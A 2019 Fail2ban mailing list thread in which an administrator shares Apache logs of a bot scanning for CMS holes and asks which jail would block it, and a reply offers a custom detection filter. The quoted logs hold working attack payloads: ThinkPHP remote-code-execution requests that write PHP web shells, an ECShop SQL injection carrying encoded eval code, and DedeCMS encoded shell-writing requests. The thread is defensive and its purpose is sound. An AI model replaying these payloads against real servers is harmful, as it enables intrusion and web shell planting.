Re: [Fail2ban-users] which jail to enable for crawlers looking for CMS vulnerabilities

Wayne Sallee Sat, 17 Aug 2019 06:40:09 -0700

You should create a custom jail like the following:

#******
cat > /etc/fail2ban/filter.d/custom-web-filter.conf << "EOF"

[Init]
badbots = BanMePlease|phpMyAdmin|base64_decode

[Definition]
failregex = (:80|:443) <HOST> .*(?:<badbots>)

ignoreregex =

EOF

#*******

Wayne Sallee
wa...@waynesallee.com

-------- Original Message --------
*Subject: *  [Fail2ban-users] which jail to enable for crawlers looking for CMS vulnerabilities
*From: *     Robert Kudyba <rkud...@fordham.edu>
*To: *         Fail2ban-users <fail2ban-users@lists.sourceforge.net>
*CC: *
*Date: *      2019-7-9  02:01 PM

I already have these enabled:
apache-auth, apache-badbots, apache-noscript, apache-overflows, apache-nohome, apache-botsearch.

But none are catching logs like these:

185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "POST /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 301 348 "http://ourdomain.edu/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "POST /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F HTTP/1.1" 301 348 "http://ourdomain.edu/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 294 "http://ourdomain.edu/index.php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:32 -0400] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.1" 301 279 "http://ourdomain.edu/admin_aspcms/_system/AspCms_SiteSetting.asp" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "GET /plus/moon.php HTTP/1.1" 301 249 "http://ourdomain.edu/plus/moon.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "POST /plus/90sec.php HTTP/1.1" 301 250 "http://ourdomain.edu/plus/90sec.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1" 301 291 "http://ourdomain.edu/utility/convert/index.php?a=config&source=d7.2_x2.0" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:33 -0400] "POST /utility/convert/data/config.inc.php HTTP/1.1" 301 271 "http://ourdomain.edu/utility/convert/data/config.inc.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:52 -0400] "POST /uploads/dede/sys_verifies.php?action="" HTTP/1.1" 301 277 "http://ourdomain.edu/uploads/dede/sys_verifies.php?action="">" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:52 -0400] "POST /index.php/api/Uploadify/preview HTTP/1.1" 301 267 "http://ourdomain.edu/index.php/api/Uploadify/preview" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:53 -0400] "GET /user.php?act=login HTTP/1.1" 301 254 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:53 -0400] "POST /fdgq.php HTTP/1.1" 301 244 "http://ourdomain.edu/fdgq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:54 -0400] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=cyggn.php&content=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E HTTP/1.1" 301 390 "http://ourdomain.edu/?s=index/\\think\\template\\driver\\file/write&cacheFile=cyggn.php&content=<?php mb_ereg_replace('.*',@$_REQUEST[_], '', 'e');?>" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:05:54 -0400] "POST /cyggn.php HTTP/1.1" 301 245 "http://ourdomain.edu/cyggn.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:13 -0400] "POST /ysyqq.php HTTP/1.1" 301 245 "http://ourdomain.edu/ysyqq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:14 -0400] "GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=virkf.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace('.*',@$_REQUEST%5B_%5D,%20'',%20'e');?%3E$ HTTP/1.1" 301 466 "http://ourdomain.edu/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=virkf.php&vars[1][]=<?php mb_ereg_replace('.*',@$_REQUEST[_], '', 'e');?>$" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:14 -0400] "POST /virkf.php HTTP/1.1" 301 245 "http://ourdomain.edu/virkf.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:15 -0400] "GET /plus/mytag_js.php?dopost=saveedit&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=116&arrs2%5B%5D=97&arrs2%5B%5D=103&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=40&arrs2%5B%5D=97&arrs2%5B%5D=105&arrs2%5B%5D=100&arrs2%5B%5D=44&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=41&arrs2%5B%5D=32&arrs2%5B%5D=86&arrs2%5B%5D=65&arrs2%5B%5D=76&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=40&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=104&arrs2%5B%5D=111&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=100&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=109&arrs2%5B%5D=115&arrs2%5B%5D=32&arrs2%5B%5D=53&arrs2%5B%5D=46&arrs2%5B%5D=55&arrs2%5B%5D=32&arrs2%5B%5D=48&arrs2%5B%5D=100&arrs2%5B%5D=97&arrs2%5B%5D=121&arrs2%5B%5D=60&arrs2%5B%5D=98&arrs2%5B%5D=114&arrs2%5B%5D=62&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=44&arrs2%5B%5D=32&arrs2%5B%5D=57&arrs2%5B%5D=48&arrs2%5B%5D=115&arrs2%5B%5D=101&arrs2%5B%5D=99&arrs2%5B%5D=46&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=103&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=59&arrs2%5B%5D=64&arrs2%5B%5D=112&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=103&arrs2%5B%5D=95&arrs2%5B%5D=114&arrs2%5B%5D=101&arrs2%5B%5D=112&arrs2%5B%5D=108&arrs2%5B%5D=97&arrs2%5B%5D=99&arrs2%5B%5D=101&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=47&arrs2%5B%5D=91&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=112&arrs2%5B%5D=121&arrs2%5B%5D=114&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=104&arrs2%5B%5D=116&arrs2%5B%5D=93&arrs2%5B%5D=47&arrs2%5B%5D=101&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=36&arrs2%5B%5D=95&arrs2%5B%5D=82&arrs2%5B%5D=69&arrs2%5B%5D=81&arrs2%5B%5D=85&arrs2%5B%5D=69&arrs2%5B%5D=83&arrs2%5B%5D=84&arrs2%5B%5D=91&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=103&arrs2%5B%5D=117&arrs2%5B%5D=105&arrs2%5B%5D=103&arrs2%5B%5D=101&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=93&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=101&arrs2%5B%5D=114&arrs2%5B%5D=114&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=63&arrs2%5B%5D=62&arrs2%5B%5D=39&arrs2%5B%5D=41&arrs2%5B%5D=59&arrs2%5B%5D=0 HTTP/1.1" 301 3573 "http://ourdomain.edu/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=57&arrs2[]=48&arrs2[]=44&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=99&arrs2[]=109&arrs2[]=115&arrs2[]=32&arrs2[]=53&arrs2[]=46&arrs2[]=55&arrs2[]=32&arrs2[]=48&arrs2[]=100&arrs2[]=97&arrs2[]=121&arrs2[]=60&arrs2[]=98&arrs2[]=114&arrs2[]=62&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=44&arrs2[]=32&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=111&arrs2[]=114&arrs2[]=103&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=112&arrs2[]=114&arrs2[]=101&arrs2[]=103&arrs2[]=95&arrs2[]=114&arrs2[]=101&arrs2[]=112&arrs2[]=108&arrs2[]=97&arrs2[]=99&arrs2[]=101&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=91&arrs2[]=99&arrs2[]=111&arrs2[]=112&arrs2[]=121&arrs2[]=114&arrs2[]=105&arrs2[]=103&arrs2[]=104&arrs2[]=116&arrs2[]=93&arrs2[]=47&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=36&arrs2[]=95&arrs2[]=82&arrs2[]=69&arrs2[]=81&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=39&arrs2[]=39&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=93&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=114&arrs2[]=114&arrs2[]=111&arrs2[]=114&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=0" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:16 -0400] "GET /plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B%5D=97&arrs2%5B%5D=100&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=83&arrs2%5B%5D=69&arrs2%5B%5D=84&arrs2%5B%5D=32&arrs2%5B%5D=96&arrs2%5B%5D=110&arrs2%5B%5D=111&arrs2%5B%5D=114&arrs2%5B%5D=109&arrs2%5B%5D=98&arrs2%5B%5D=111&arrs2%5B%5D=100&arrs2%5B%5D=121&arrs2%5B%5D=96&arrs2%5B%5D=32&arrs2%5B%5D=61&arrs2%5B%5D=32&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=102&arrs2%5B%5D=105&arrs2%5B%5D=108&arrs2%5B%5D=101&arrs2%5B%5D=95&arrs2%5B%5D=112&arrs2%5B%5D=117&arrs2%5B%5D=116&arrs2%5B%5D=95&arrs2%5B%5D=99&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=101&arrs2%5B%5D=110&arrs2%5B%5D=116&arrs2%5B%5D=115&arrs2%5B%5D=40&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=109&arrs2%5B%5D=111&arrs2%5B%5D=111&arrs2%5B%5D=110&arrs2%5B%5D=46&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=44&arrs2%5B%5D=39&arrs2%5B%5D=39&arrs2%5B%5D=60&arrs2%5B%5D=63&arrs2%5B%5D=112&arrs2%5B%5D=104&arrs2%5B%5D=112&arrs2%5B%5D=32&arrs2%5B%5D=101&arrs2%5B%5D=118&arrs2%5B%5D=97&arrs2%5B%5D=108&arrs2%5B%5D=40&ar HTTP/1.1" 301 1950 "http://ourdomain.edu/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=111&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&ar" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:17 -0400] "POST /admin_aspcms/_system/AspCms_SiteSetting.asp HTTP/1.1" 301 279 "http://ourdomain.edu/admin_aspcms/_system/AspCms_SiteSetting.asp" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"
185.153.180.63 - - [09/Jul/2019:11:06:19 -0400] "POST /e/DoInfo/ecms.php HTTP/1.1" 301 253 "http://ourdomain.edu/e/DoInfo/ecms.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"

Any idea which jail I should enable?
_______________________________________________
Fail2ban-users mailing list
Fail2ban-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/fail2ban-users

_______________________________________________
Fail2ban-users mailing list
Fail2ban-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/fail2ban-users

Re: [Fail2ban-users] which jail to enable for crawlers looking for CMS vulnerabilities

Reply via email to